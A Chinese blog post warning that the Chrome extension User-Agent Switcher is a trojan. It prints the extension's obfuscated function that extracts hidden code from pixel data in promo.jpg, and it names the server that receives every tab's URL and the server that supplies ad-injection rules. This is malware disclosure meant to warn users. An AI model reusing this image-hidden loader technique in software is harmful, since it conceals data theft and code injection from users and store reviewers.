当前位置:首页 > 业界动态 > 正文内容

Chrome 的插件 User-Agent Switcher 是个木马!

炫懿3年前 (2017-09-11)业界动态1027

chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

Chrome 的插件 User-Agent Switcher 是个木马.jpg Chrome 的插件 User-Agent Switcher 是个木马! 业界动态

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了promo.jpg 里background.js 的第 80 行,从这个图片里解密出恶意代码并执行。

<span>t.prototype.Vh = function(t, e) {
            </span><span>if</span><span> (</span><span>""</span><span> === </span><span>'../promo.jpg'</span><span>) </span><span>return</span><span>""</span><span>;
            </span><span>void</span><span>0</span><span> === t && (t = </span><span>'../promo.jpg'</span><span>), t.length && (t = r.Wk(t)), e = e || {};
            var n = </span><span>this</span><span>.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.</span><span>pow</span><span>(</span><span>2</span><span>, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement(</span><span>"canvas"</span><span>),
                p = u.getContext(</span><span>"2d"</span><span>);
            </span><span>if</span><span> (u.style.display = </span><span>"none"</span><span>, u.</span><span>width</span><span> = e.</span><span>width</span><span> || t.</span><span>width</span><span>, u.</span><span>height</span><span> = e.</span><span>width</span><span> || t.</span><span>height</span><span>, </span><span>0</span><span> === u.</span><span>width</span><span> || </span><span>0</span><span> === u.</span><span>height</span><span>) </span><span>
return</span><span>""</span><span>;
            e.</span><span>height</span><span> && e.</span><span>width</span><span> ? p.drawImage(t, </span><span>0</span><span>, </span><span>0</span><span>, e.</span><span>width</span><span>, e.</span><span>height</span><span>) : p.drawImage(t, </span><span>0</span><span>, </span><span>0</span><span>);
            var c = p.getImageData(</span><span>0</span><span>, </span><span>0</span><span>, u.</span><span>width</span><span>, u.</span><span>height</span><span>),
                d = c.data,
                g = [];
            </span><span>if</span><span> (c.data.every(function(t) {
                    </span><span>return</span><span>0</span><span> === t
                })) </span><span>return</span><span>""</span><span>;
            var m, s;
            </span><span>if</span><span> (</span><span>1</span><span> === o)
                </span><span>for</span><span> (m = </span><span>3</span><span>, s = !</span><span>1</span><span>; !s && m < d.length && !s; m += </span><span>4</span><span>) s = f(d, m, o), s || g.push(d[m] - (</span><span>255</span><span> - a + </span><span>1</span><span>));
            var v = </span><span>""</span><span>,
                w = </span><span>0</span><span>,
                y = </span><span>0</span><span>,
                l = Math.</span><span>pow</span><span>(</span><span>2</span><span>, h) - </span><span>1</span><span>;
            </span><span>for</span><span> (m = </span><span>0</span><span>; m < g.length; m += </span><span>1</span><span>) w += g[m] << y, y += i, y >= h && (v += </span><span>String</span><span>.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            </span><span>return</span><span> v.length < </span><span>13</span><span> ? </span><span>""</span><span> : (</span><span>0</span><span> !== w && (v += </span><span>String</span><span>.fromCharCode(w & l)), v)
        }</span>
 
<br>

会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data


另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.


根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..


https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm


https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah


https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa


https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg



相关文章

[Windows] 谷歌地球 v7.3.0.3830 专业版绿色便携版

[Windows] 谷歌地球 v7.3.0.3830 专业版绿色便携版

  Google地球能带您飞往地球上的任何地方,您可以在上面查看卫星图像、地图、地形和3D建筑。不论是外太空的浩渺星系,还是大洋之下的陡峭峡谷,均可一览无余。踏上前往世界任何角落的虚拟之旅。...

手机应用开发者被前妻逼迫自杀

手机应用开发者被前妻逼迫自杀

 有媒体报道称,网络长途电话和国际电话应用WePhone的开发者苏享茂因遭遇骗婚被前妻所逼、遭索要1000万元和房产赔偿后自杀身亡。他在世纪佳缘上结识了自己的妻子翟某某,随后遭遇骗婚,并被被前妻逼死。...

国内外免费DNS域名解析服务汇总

国内外免费DNS域名解析服务汇总

  今天给大家整理一下国内外那些免费的DNS域名解析服务,希望对你有所帮助。  DNS域名解析服务并不只有一家,免费的DNS域名解析服务在国外也非常地常见,除了没有地理位置和线路识...

[WINDOWS]LightBulb 1.6.3.4 便携版 - 电脑屏幕色温自动调节工具、有效保护眼睛

[WINDOWS]LightBulb 1.6.3.4 便携版 - 电脑屏幕色温自动调节工具、有效保护眼睛

  LightBulb 是一个屏幕色温调节软件和蓝光过滤器,可以减少蓝光输出,达到护眼效果,对于像博主一样一天用电脑十多个小时的人来说,非常不错。它与著名的 f.lux 是同类型软件,不过...

 [Windows]在Windows系统上修复Meltdown和Specture CPU漏洞

[Windows]在Windows系统上修复Meltdown和Specture CPU漏洞

为了编写本文,我们参考了四个微软的帮助文档,或许你也会对它们有兴趣:1,Windows桌面用户指南2,Windows服务器用户指南3,安全建议ADV180002(包含更新软件包的KB编号)4,更新第三...

BBC记者挑战中国天网,7分钟被抓

BBC记者挑战中国天网,7分钟被抓

 这个周末,BBC记者约翰·苏德沃斯在我国贵阳体验了这项“天网工程”,在被手机拍下一张面部照片后,仅仅“潜逃”七分钟,就被中国警方抓获。而他刚走进车站售票厅,警方就已经在监控中,发现了苏德沃...

评论列表

godaddy
3年前 (2017-10-21)

朋友 交换链接吗

炫懿 回复:
你的站点呢?
3年前 (2017-10-21)
godaddy 回复:
我站:http://www.goyouhuima.com/ 站名:godaddy
3年前 (2017-10-23)
炫懿 回复:
抱歉,暂时只友链博客
3年前 (2017-10-24)
狂放
3年前 (2017-10-08)

纳尼,我现在用着呢

炫懿 回复:
不建议使用了
3年前 (2017-10-17)

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
召唤伊斯特瓦尔